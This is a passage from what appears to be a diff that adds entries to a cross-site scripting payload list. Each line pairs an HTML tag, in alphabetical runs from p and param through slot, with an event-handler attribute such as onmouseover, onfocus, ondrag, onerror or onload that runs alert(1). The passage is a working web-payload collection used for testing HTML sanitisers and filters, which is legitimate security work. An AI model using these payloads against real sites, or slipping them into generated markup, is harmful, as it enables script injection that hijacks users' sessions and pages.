+<p onmouseover="alert(1)">test</p> +<p onmouseup="alert(1)">test</p> +<p onpaste="alert(1)" contenteditable>test</p> +<param draggable="true" ondrag="alert(1)">test</param> +<param draggable="true" ondragend="alert(1)">test</param> +<param draggable="true" ondragenter="alert(1)">test</param> +<param draggable="true" ondragleave="alert(1)">test</param> +<param draggable="true" ondragstart="alert(1)">test</param> +<param id=x tabindex=1 onactivate=alert(1)></param> +<param id=x tabindex=1 onbeforeactivate=alert(1)></param> +<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus> +<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> +<param id=x tabindex=1 onfocus=alert(1)></param> +<param id=x tabindex=1 onfocusin=alert(1)></param> +<param onbeforecopy="alert(1)" contenteditable>test</param> +<param onbeforecut="alert(1)" contenteditable>test</param> +<param onbeforepaste="alert(1)" contenteditable>test</param> +<param onblur=alert(1) tabindex=1 id=x></param><input autofocus> +<param onclick="alert(1)">test</param> +<param oncontextmenu="alert(1)">test</param> +<param oncopy="alert(1)" contenteditable>test</param> +<param oncut="alert(1)" contenteditable>test</param> +<param ondblclick="alert(1)">test</param> +<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> +<param onkeydown="alert(1)" contenteditable>test</param> +<param onkeypress="alert(1)" contenteditable>test</param> +<param onkeyup="alert(1)" contenteditable>test</param> +<param onmousedown="alert(1)">test</param> +<param onmouseenter="alert(1)">test</param> +<param onmouseleave="alert(1)">test</param> +<param onmousemove="alert(1)">test</param> +<param onmouseout="alert(1)">test</param> +<param onmouseover="alert(1)">test</param> +<param onmouseup="alert(1)">test</param> +<param onpaste="alert(1)" contenteditable>test</param> +<picture draggable="true" ondrag="alert(1)">test</picture> +<picture draggable="true" ondragend="alert(1)">test</picture> +<picture draggable="true" ondragenter="alert(1)">test</picture> +<picture draggable="true" ondragleave="alert(1)">test</picture> +<picture draggable="true" ondragstart="alert(1)">test</picture> +<picture id=x tabindex=1 onactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> +<picture id=x tabindex=1 onfocus=alert(1)></picture> +<picture id=x tabindex=1 onfocusin=alert(1)></picture> +<picture onbeforecopy="alert(1)" contenteditable>test</picture> +<picture onbeforecut="alert(1)" contenteditable>test</picture> +<picture onbeforepaste="alert(1)" contenteditable>test</picture> +<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onclick="alert(1)">test</picture> +<picture oncontextmenu="alert(1)">test</picture> +<picture oncopy="alert(1)" contenteditable>test</picture> +<picture oncut="alert(1)" contenteditable>test</picture> +<picture ondblclick="alert(1)">test</picture> +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onkeydown="alert(1)" contenteditable>test</picture> +<picture onkeypress="alert(1)" contenteditable>test</picture> +<picture onkeyup="alert(1)" contenteditable>test</picture> +<picture onmousedown="alert(1)">test</picture> +<picture onmouseenter="alert(1)">test</picture> +<picture onmouseleave="alert(1)">test</picture> +<picture onmousemove="alert(1)">test</picture> +<picture onmouseout="alert(1)">test</picture> +<picture onmouseover="alert(1)">test</picture> +<picture onmouseup="alert(1)">test</picture> +<picture onpaste="alert(1)" contenteditable>test</picture> +<picture><source srcset="validimage.png"><image onload=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> +<picture><source srcset="validimage.png"><img onload=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> +<plaintext draggable="true" ondrag="alert(1)">test</plaintext> +<plaintext draggable="true" ondragend="alert(1)">test</plaintext> +<plaintext draggable="true" ondragenter="alert(1)">test</plaintext> +<plaintext draggable="true" ondragleave="alert(1)">test</plaintext> +<plaintext draggable="true" ondragstart="alert(1)">test</plaintext> +<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> +<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> +<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> +<plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> +<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onclick="alert(1)">test</plaintext> +<plaintext oncontextmenu="alert(1)">test</plaintext> +<plaintext oncopy="alert(1)" contenteditable>test</plaintext> +<plaintext oncut="alert(1)" contenteditable>test</plaintext> +<plaintext ondblclick="alert(1)">test</plaintext> +<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onkeydown="alert(1)" contenteditable>test</plaintext> +<plaintext onkeypress="alert(1)" contenteditable>test</plaintext> +<plaintext onkeyup="alert(1)" contenteditable>test</plaintext> +<plaintext onmousedown="alert(1)">test</plaintext> +<plaintext onmouseenter="alert(1)">test</plaintext> +<plaintext onmouseleave="alert(1)">test</plaintext> +<plaintext onmousemove="alert(1)">test</plaintext> +<plaintext onmouseout="alert(1)">test</plaintext> +<plaintext onmouseover="alert(1)">test</plaintext> +<plaintext onmouseup="alert(1)">test</plaintext> +<plaintext onpaste="alert(1)" contenteditable>test</plaintext> +<pre draggable="true" ondrag="alert(1)">test</pre> +<pre draggable="true" ondragend="alert(1)">test</pre> +<pre draggable="true" ondragenter="alert(1)">test</pre> +<pre draggable="true" ondragleave="alert(1)">test</pre> +<pre draggable="true" ondragstart="alert(1)">test</pre> +<pre id=x tabindex=1 onactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> +<pre id=x tabindex=1 onfocus=alert(1)></pre> +<pre id=x tabindex=1 onfocusin=alert(1)></pre> +<pre onbeforecopy="alert(1)" contenteditable>test</pre> +<pre onbeforecut="alert(1)" contenteditable>test</pre> +<pre onbeforepaste="alert(1)" contenteditable>test</pre> +<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onclick="alert(1)">test</pre> +<pre oncontextmenu="alert(1)">test</pre> +<pre oncopy="alert(1)" contenteditable>test</pre> +<pre oncut="alert(1)" contenteditable>test</pre> +<pre ondblclick="alert(1)">test</pre> +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onkeydown="alert(1)" contenteditable>test</pre> +<pre onkeypress="alert(1)" contenteditable>test</pre> +<pre onkeyup="alert(1)" contenteditable>test</pre> +<pre onmousedown="alert(1)">test</pre> +<pre onmouseenter="alert(1)">test</pre> +<pre onmouseleave="alert(1)">test</pre> +<pre onmousemove="alert(1)">test</pre> +<pre onmouseout="alert(1)">test</pre> +<pre onmouseover="alert(1)">test</pre> +<pre onmouseup="alert(1)">test</pre> +<pre onpaste="alert(1)" contenteditable>test</pre> +<progress draggable="true" ondrag="alert(1)">test</progress> +<progress draggable="true" ondragend="alert(1)">test</progress> +<progress draggable="true" ondragenter="alert(1)">test</progress> +<progress draggable="true" ondragleave="alert(1)">test</progress> +<progress draggable="true" ondragstart="alert(1)">test</progress> +<progress id=x tabindex=1 onactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> +<progress id=x tabindex=1 onfocus=alert(1)></progress> +<progress id=x tabindex=1 onfocusin=alert(1)></progress> +<progress onbeforecopy="alert(1)" contenteditable>test</progress> +<progress onbeforecut="alert(1)" contenteditable>test</progress> +<progress onbeforepaste="alert(1)" contenteditable>test</progress> +<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onclick="alert(1)">test</progress> +<progress oncontextmenu="alert(1)">test</progress> +<progress oncopy="alert(1)" contenteditable>test</progress> +<progress oncut="alert(1)" contenteditable>test</progress> +<progress ondblclick="alert(1)">test</progress> +<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onkeydown="alert(1)" contenteditable>test</progress> +<progress onkeypress="alert(1)" contenteditable>test</progress> +<progress onkeyup="alert(1)" contenteditable>test</progress> +<progress onmousedown="alert(1)">test</progress> +<progress onmouseenter="alert(1)">test</progress> +<progress onmouseleave="alert(1)">test</progress> +<progress onmousemove="alert(1)">test</progress> +<progress onmouseout="alert(1)">test</progress> +<progress onmouseover="alert(1)">test</progress> +<progress onmouseup="alert(1)">test</progress> +<progress onpaste="alert(1)" contenteditable>test</progress> +<q draggable="true" ondrag="alert(1)">test</q> +<q draggable="true" ondragend="alert(1)">test</q> +<q draggable="true" ondragenter="alert(1)">test</q> +<q draggable="true" ondragleave="alert(1)">test</q> +<q draggable="true" ondragstart="alert(1)">test</q> +<q id=x tabindex=1 onactivate=alert(1)></q> +<q id=x tabindex=1 onbeforeactivate=alert(1)></q> +<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> +<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> +<q id=x tabindex=1 onfocus=alert(1)></q> +<q id=x tabindex=1 onfocusin=alert(1)></q> +<q onbeforecopy="alert(1)" contenteditable>test</q> +<q onbeforecut="alert(1)" contenteditable>test</q> +<q onbeforepaste="alert(1)" contenteditable>test</q> +<q onblur=alert(1) tabindex=1 id=x></q><input autofocus> +<q onclick="alert(1)">test</q> +<q oncontextmenu="alert(1)">test</q> +<q oncopy="alert(1)" contenteditable>test</q> +<q oncut="alert(1)" contenteditable>test</q> +<q ondblclick="alert(1)">test</q> +<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> +<q onkeydown="alert(1)" contenteditable>test</q> +<q onkeypress="alert(1)" contenteditable>test</q> +<q onkeyup="alert(1)" contenteditable>test</q> +<q onmousedown="alert(1)">test</q> +<q onmouseenter="alert(1)">test</q> +<q onmouseleave="alert(1)">test</q> +<q onmousemove="alert(1)">test</q> +<q onmouseout="alert(1)">test</q> +<q onmouseover="alert(1)">test</q> +<q onmouseup="alert(1)">test</q> +<q onpaste="alert(1)" contenteditable>test</q> +<rb draggable="true" ondrag="alert(1)">test</rb> +<rb draggable="true" ondragend="alert(1)">test</rb> +<rb draggable="true" ondragenter="alert(1)">test</rb> +<rb draggable="true" ondragleave="alert(1)">test</rb> +<rb draggable="true" ondragstart="alert(1)">test</rb> +<rb id=x tabindex=1 onactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> +<rb id=x tabindex=1 onfocus=alert(1)></rb> +<rb id=x tabindex=1 onfocusin=alert(1)></rb> +<rb onbeforecopy="alert(1)" contenteditable>test</rb> +<rb onbeforecut="alert(1)" contenteditable>test</rb> +<rb onbeforepaste="alert(1)" contenteditable>test</rb> +<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onclick="alert(1)">test</rb> +<rb oncontextmenu="alert(1)">test</rb> +<rb oncopy="alert(1)" contenteditable>test</rb> +<rb oncut="alert(1)" contenteditable>test</rb> +<rb ondblclick="alert(1)">test</rb> +<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onkeydown="alert(1)" contenteditable>test</rb> +<rb onkeypress="alert(1)" contenteditable>test</rb> +<rb onkeyup="alert(1)" contenteditable>test</rb> +<rb onmousedown="alert(1)">test</rb> +<rb onmouseenter="alert(1)">test</rb> +<rb onmouseleave="alert(1)">test</rb> +<rb onmousemove="alert(1)">test</rb> +<rb onmouseout="alert(1)">test</rb> +<rb onmouseover="alert(1)">test</rb> +<rb onmouseup="alert(1)">test</rb> +<rb onpaste="alert(1)" contenteditable>test</rb> +<rp draggable="true" ondrag="alert(1)">test</rp> +<rp draggable="true" ondragend="alert(1)">test</rp> +<rp draggable="true" ondragenter="alert(1)">test</rp> +<rp draggable="true" ondragleave="alert(1)">test</rp> +<rp draggable="true" ondragstart="alert(1)">test</rp> +<rp id=x tabindex=1 onactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> +<rp id=x tabindex=1 onfocus=alert(1)></rp> +<rp id=x tabindex=1 onfocusin=alert(1)></rp> +<rp onbeforecopy="alert(1)" contenteditable>test</rp> +<rp onbeforecut="alert(1)" contenteditable>test</rp> +<rp onbeforepaste="alert(1)" contenteditable>test</rp> +<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onclick="alert(1)">test</rp> +<rp oncontextmenu="alert(1)">test</rp> +<rp oncopy="alert(1)" contenteditable>test</rp> +<rp oncut="alert(1)" contenteditable>test</rp> +<rp ondblclick="alert(1)">test</rp> +<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onkeydown="alert(1)" contenteditable>test</rp> +<rp onkeypress="alert(1)" contenteditable>test</rp> +<rp onkeyup="alert(1)" contenteditable>test</rp> +<rp onmousedown="alert(1)">test</rp> +<rp onmouseenter="alert(1)">test</rp> +<rp onmouseleave="alert(1)">test</rp> +<rp onmousemove="alert(1)">test</rp> +<rp onmouseout="alert(1)">test</rp> +<rp onmouseover="alert(1)">test</rp> +<rp onmouseup="alert(1)">test</rp> +<rp onpaste="alert(1)" contenteditable>test</rp> +<rt draggable="true" ondrag="alert(1)">test</rt> +<rt draggable="true" ondragend="alert(1)">test</rt> +<rt draggable="true" ondragenter="alert(1)">test</rt> +<rt draggable="true" ondragleave="alert(1)">test</rt> +<rt draggable="true" ondragstart="alert(1)">test</rt> +<rt id=x tabindex=1 onactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> +<rt id=x tabindex=1 onfocus=alert(1)></rt> +<rt id=x tabindex=1 onfocusin=alert(1)></rt> +<rt onbeforecopy="alert(1)" contenteditable>test</rt> +<rt onbeforecut="alert(1)" contenteditable>test</rt> +<rt onbeforepaste="alert(1)" contenteditable>test</rt> +<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onclick="alert(1)">test</rt> +<rt oncontextmenu="alert(1)">test</rt> +<rt oncopy="alert(1)" contenteditable>test</rt> +<rt oncut="alert(1)" contenteditable>test</rt> +<rt ondblclick="alert(1)">test</rt> +<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onkeydown="alert(1)" contenteditable>test</rt> +<rt onkeypress="alert(1)" contenteditable>test</rt> +<rt onkeyup="alert(1)" contenteditable>test</rt> +<rt onmousedown="alert(1)">test</rt> +<rt onmouseenter="alert(1)">test</rt> +<rt onmouseleave="alert(1)">test</rt> +<rt onmousemove="alert(1)">test</rt> +<rt onmouseout="alert(1)">test</rt> +<rt onmouseover="alert(1)">test</rt> +<rt onmouseup="alert(1)">test</rt> +<rt onpaste="alert(1)" contenteditable>test</rt> +<rtc draggable="true" ondrag="alert(1)">test</rtc> +<rtc draggable="true" ondragend="alert(1)">test</rtc> +<rtc draggable="true" ondragenter="alert(1)">test</rtc> +<rtc draggable="true" ondragleave="alert(1)">test</rtc> +<rtc draggable="true" ondragstart="alert(1)">test</rtc> +<rtc id=x tabindex=1 onactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus> +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> +<rtc id=x tabindex=1 onfocus=alert(1)></rtc> +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc> +<rtc onbeforecopy="alert(1)" contenteditable>test</rtc> +<rtc onbeforecut="alert(1)" contenteditable>test</rtc> +<rtc onbeforepaste="alert(1)" contenteditable>test</rtc> +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onclick="alert(1)">test</rtc> +<rtc oncontextmenu="alert(1)">test</rtc> +<rtc oncopy="alert(1)" contenteditable>test</rtc> +<rtc oncut="alert(1)" contenteditable>test</rtc> +<rtc ondblclick="alert(1)">test</rtc> +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onkeydown="alert(1)" contenteditable>test</rtc> +<rtc onkeypress="alert(1)" contenteditable>test</rtc> +<rtc onkeyup="alert(1)" contenteditable>test</rtc> +<rtc onmousedown="alert(1)">test</rtc> +<rtc onmouseenter="alert(1)">test</rtc> +<rtc onmouseleave="alert(1)">test</rtc> +<rtc onmousemove="alert(1)">test</rtc> +<rtc onmouseout="alert(1)">test</rtc> +<rtc onmouseover="alert(1)">test</rtc> +<rtc onmouseup="alert(1)">test</rtc> +<rtc onpaste="alert(1)" contenteditable>test</rtc> +<ruby draggable="true" ondrag="alert(1)">test</ruby> +<ruby draggable="true" ondragend="alert(1)">test</ruby> +<ruby draggable="true" ondragenter="alert(1)">test</ruby> +<ruby draggable="true" ondragleave="alert(1)">test</ruby> +<ruby draggable="true" ondragstart="alert(1)">test</ruby> +<ruby id=x tabindex=1 onactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> +<ruby id=x tabindex=1 onfocus=alert(1)></ruby> +<ruby id=x tabindex=1 onfocusin=alert(1)></ruby> +<ruby onbeforecopy="alert(1)" contenteditable>test</ruby> +<ruby onbeforecut="alert(1)" contenteditable>test</ruby> +<ruby onbeforepaste="alert(1)" contenteditable>test</ruby> +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onclick="alert(1)">test</ruby> +<ruby oncontextmenu="alert(1)">test</ruby> +<ruby oncopy="alert(1)" contenteditable>test</ruby> +<ruby oncut="alert(1)" contenteditable>test</ruby> +<ruby ondblclick="alert(1)">test</ruby> +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onkeydown="alert(1)" contenteditable>test</ruby> +<ruby onkeypress="alert(1)" contenteditable>test</ruby> +<ruby onkeyup="alert(1)" contenteditable>test</ruby> +<ruby onmousedown="alert(1)">test</ruby> +<ruby onmouseenter="alert(1)">test</ruby> +<ruby onmouseleave="alert(1)">test</ruby> +<ruby onmousemove="alert(1)">test</ruby> +<ruby onmouseout="alert(1)">test</ruby> +<ruby onmouseover="alert(1)">test</ruby> +<ruby onmouseup="alert(1)">test</ruby> +<ruby onpaste="alert(1)" contenteditable>test</ruby> +<s draggable="true" ondrag="alert(1)">test</s> +<s draggable="true" ondragend="alert(1)">test</s> +<s draggable="true" ondragenter="alert(1)">test</s> +<s draggable="true" ondragleave="alert(1)">test</s> +<s draggable="true" ondragstart="alert(1)">test</s> +<s id=x tabindex=1 onactivate=alert(1)></s> +<s id=x tabindex=1 onbeforeactivate=alert(1)></s> +<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> +<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> +<s id=x tabindex=1 onfocus=alert(1)></s> +<s id=x tabindex=1 onfocusin=alert(1)></s> +<s onbeforecopy="alert(1)" contenteditable>test</s> +<s onbeforecut="alert(1)" contenteditable>test</s> +<s onbeforepaste="alert(1)" contenteditable>test</s> +<s onblur=alert(1) tabindex=1 id=x></s><input autofocus> +<s onclick="alert(1)">test</s> +<s oncontextmenu="alert(1)">test</s> +<s oncopy="alert(1)" contenteditable>test</s> +<s oncut="alert(1)" contenteditable>test</s> +<s ondblclick="alert(1)">test</s> +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> +<s onkeydown="alert(1)" contenteditable>test</s> +<s onkeypress="alert(1)" contenteditable>test</s> +<s onkeyup="alert(1)" contenteditable>test</s> +<s onmousedown="alert(1)">test</s> +<s onmouseenter="alert(1)">test</s> +<s onmouseleave="alert(1)">test</s> +<s onmousemove="alert(1)">test</s> +<s onmouseout="alert(1)">test</s> +<s onmouseover="alert(1)">test</s> +<s onmouseup="alert(1)">test</s> +<s onpaste="alert(1)" contenteditable>test</s> +<samp draggable="true" ondrag="alert(1)">test</samp> +<samp draggable="true" ondragend="alert(1)">test</samp> +<samp draggable="true" ondragenter="alert(1)">test</samp> +<samp draggable="true" ondragleave="alert(1)">test</samp> +<samp draggable="true" ondragstart="alert(1)">test</samp> +<samp id=x tabindex=1 onactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> +<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> +<samp id=x tabindex=1 onfocus=alert(1)></samp> +<samp id=x tabindex=1 onfocusin=alert(1)></samp> +<samp onbeforecopy="alert(1)" contenteditable>test</samp> +<samp onbeforecut="alert(1)" contenteditable>test</samp> +<samp onbeforepaste="alert(1)" contenteditable>test</samp> +<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onclick="alert(1)">test</samp> +<samp oncontextmenu="alert(1)">test</samp> +<samp oncopy="alert(1)" contenteditable>test</samp> +<samp oncut="alert(1)" contenteditable>test</samp> +<samp ondblclick="alert(1)">test</samp> +<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onkeydown="alert(1)" contenteditable>test</samp> +<samp onkeypress="alert(1)" contenteditable>test</samp> +<samp onkeyup="alert(1)" contenteditable>test</samp> +<samp onmousedown="alert(1)">test</samp> +<samp onmouseenter="alert(1)">test</samp> +<samp onmouseleave="alert(1)">test</samp> +<samp onmousemove="alert(1)">test</samp> +<samp onmouseout="alert(1)">test</samp> +<samp onmouseover="alert(1)">test</samp> +<samp onmouseup="alert(1)">test</samp> +<samp onpaste="alert(1)" contenteditable>test</samp> +<script draggable="true" ondrag="alert(1)">test</script> +<script draggable="true" ondragend="alert(1)">test</script> +<script draggable="true" ondragenter="alert(1)">test</script> +<script draggable="true" ondragleave="alert(1)">test</script> +<script draggable="true" ondragstart="alert(1)">test</script> +<script id=x tabindex=1 onactivate=alert(1)></script> +<script id=x tabindex=1 onbeforeactivate=alert(1)></script> +<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> +<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> +<script id=x tabindex=1 onfocus=alert(1)></script> +<script id=x tabindex=1 onfocusin=alert(1)></script> +<script onbeforecopy="alert(1)" contenteditable>test</script> +<script onbeforecut="alert(1)" contenteditable>test</script> +<script onbeforepaste="alert(1)" contenteditable>test</script> +<script onblur=alert(1) tabindex=1 id=x></script><input autofocus> +<script onclick="alert(1)">test</script> +<script oncontextmenu="alert(1)">test</script> +<script oncopy="alert(1)" contenteditable>test</script> +<script oncut="alert(1)" contenteditable>test</script> +<script ondblclick="alert(1)">test</script> +<script onerror=alert(1) src=/></script> +<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> +<script onkeydown="alert(1)" contenteditable>test</script> +<script onkeypress="alert(1)" contenteditable>test</script> +<script onkeyup="alert(1)" contenteditable>test</script> +<script onload=alert(1) src=validjs.js></script> +<script onmousedown="alert(1)">test</script> +<script onmouseenter="alert(1)">test</script> +<script onmouseleave="alert(1)">test</script> +<script onmousemove="alert(1)">test</script> +<script onmouseout="alert(1)">test</script> +<script onmouseover="alert(1)">test</script> +<script onmouseup="alert(1)">test</script> +<script onpaste="alert(1)" contenteditable>test</script> +<script onreadystatechange=alert(1)></script> +<section draggable="true" ondrag="alert(1)">test</section> +<section draggable="true" ondragend="alert(1)">test</section> +<section draggable="true" ondragenter="alert(1)">test</section> +<section draggable="true" ondragleave="alert(1)">test</section> +<section draggable="true" ondragstart="alert(1)">test</section> +<section id=x tabindex=1 onactivate=alert(1)></section> +<section id=x tabindex=1 onbeforeactivate=alert(1)></section> +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> +<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> +<section id=x tabindex=1 onfocus=alert(1)></section> +<section id=x tabindex=1 onfocusin=alert(1)></section> +<section onbeforecopy="alert(1)" contenteditable>test</section> +<section onbeforecut="alert(1)" contenteditable>test</section> +<section onbeforepaste="alert(1)" contenteditable>test</section> +<section onblur=alert(1) tabindex=1 id=x></section><input autofocus> +<section onclick="alert(1)">test</section> +<section oncontextmenu="alert(1)">test</section> +<section oncopy="alert(1)" contenteditable>test</section> +<section oncut="alert(1)" contenteditable>test</section> +<section ondblclick="alert(1)">test</section> +<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> +<section onkeydown="alert(1)" contenteditable>test</section> +<section onkeypress="alert(1)" contenteditable>test</section> +<section onkeyup="alert(1)" contenteditable>test</section> +<section onmousedown="alert(1)">test</section> +<section onmouseenter="alert(1)">test</section> +<section onmouseleave="alert(1)">test</section> +<section onmousemove="alert(1)">test</section> +<section onmouseout="alert(1)">test</section> +<section onmouseover="alert(1)">test</section> +<section onmouseup="alert(1)">test</section> +<section onpaste="alert(1)" contenteditable>test</section> +<select autofocus onfocus=alert(1)> +<select autofocus onfocusin=alert(1)> +<select draggable="true" ondrag="alert(1)">test</select> +<select draggable="true" ondragend="alert(1)">test</select> +<select draggable="true" ondragenter="alert(1)">test</select> +<select draggable="true" ondragleave="alert(1)">test</select> +<select draggable="true" ondragstart="alert(1)">test</select> +<select id=x tabindex=1 onactivate=alert(1)></select> +<select id=x tabindex=1 onbeforeactivate=alert(1)></select> +<select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> +<select onbeforecopy="alert(1)" contenteditable>test</select> +<select onbeforecut="alert(1)" contenteditable>test</select> +<select onbeforepaste="alert(1)" contenteditable>test</select> +<select onblur=alert(1) id=x></select><input autofocus> +<select onchange=alert(1)><option>change me</option><option>XSS</option></select> +<select onclick="alert(1)">test</select> +<select oncontextmenu="alert(1)">test</select> +<select oncopy="alert(1)" contenteditable>test</select> +<select oncut="alert(1)" contenteditable>test</select> +<select ondblclick="alert(1)">test</select> +<select onfocusout=alert(1) id=x></select><input autofocus> +<select onkeydown="alert(1)" contenteditable>test</select> +<select onkeypress="alert(1)" contenteditable>test</select> +<select onkeyup="alert(1)" contenteditable>test</select> +<select onmousedown="alert(1)">test</select> +<select onmouseenter="alert(1)">test</select> +<select onmouseleave="alert(1)">test</select> +<select onmousemove="alert(1)">test</select> +<select onmouseout="alert(1)">test</select> +<select onmouseover="alert(1)">test</select> +<select onmouseup="alert(1)">test</select> +<select onpaste="alert(1)" contenteditable>test</select> +<shadow draggable="true" ondrag="alert(1)">test</shadow> +<shadow draggable="true" ondragend="alert(1)">test</shadow> +<shadow draggable="true" ondragenter="alert(1)">test</shadow> +<shadow draggable="true" ondragleave="alert(1)">test</shadow> +<shadow draggable="true" ondragstart="alert(1)">test</shadow> +<shadow id=x tabindex=1 onactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> +<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> +<shadow id=x tabindex=1 onfocus=alert(1)></shadow> +<shadow id=x tabindex=1 onfocusin=alert(1)></shadow> +<shadow onbeforecopy="alert(1)" contenteditable>test</shadow> +<shadow onbeforecut="alert(1)" contenteditable>test</shadow> +<shadow onbeforepaste="alert(1)" contenteditable>test</shadow> +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onclick="alert(1)">test</shadow> +<shadow oncontextmenu="alert(1)">test</shadow> +<shadow oncopy="alert(1)" contenteditable>test</shadow> +<shadow oncut="alert(1)" contenteditable>test</shadow> +<shadow ondblclick="alert(1)">test</shadow> +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onkeydown="alert(1)" contenteditable>test</shadow> +<shadow onkeypress="alert(1)" contenteditable>test</shadow> +<shadow onkeyup="alert(1)" contenteditable>test</shadow> +<shadow onmousedown="alert(1)">test</shadow> +<shadow onmouseenter="alert(1)">test</shadow> +<shadow onmouseleave="alert(1)">test</shadow> +<shadow onmousemove="alert(1)">test</shadow> +<shadow onmouseout="alert(1)">test</shadow> +<shadow onmouseover="alert(1)">test</shadow> +<shadow onmouseup="alert(1)">test</shadow> +<shadow onpaste="alert(1)" contenteditable>test</shadow> +<slot draggable="true" ondrag="alert(1)">test</slot> +<slot draggable="true" ondragend="alert(1)">test</slot> +<slot draggable="true" ondragenter="alert(1)">test</slot> +<slot draggable="true" ondragleave="alert(1)">test</slot> +<slot draggable="true" ondragstart="alert(1)">test</slot> +<slot id=x tabindex=1 onactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> +<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y 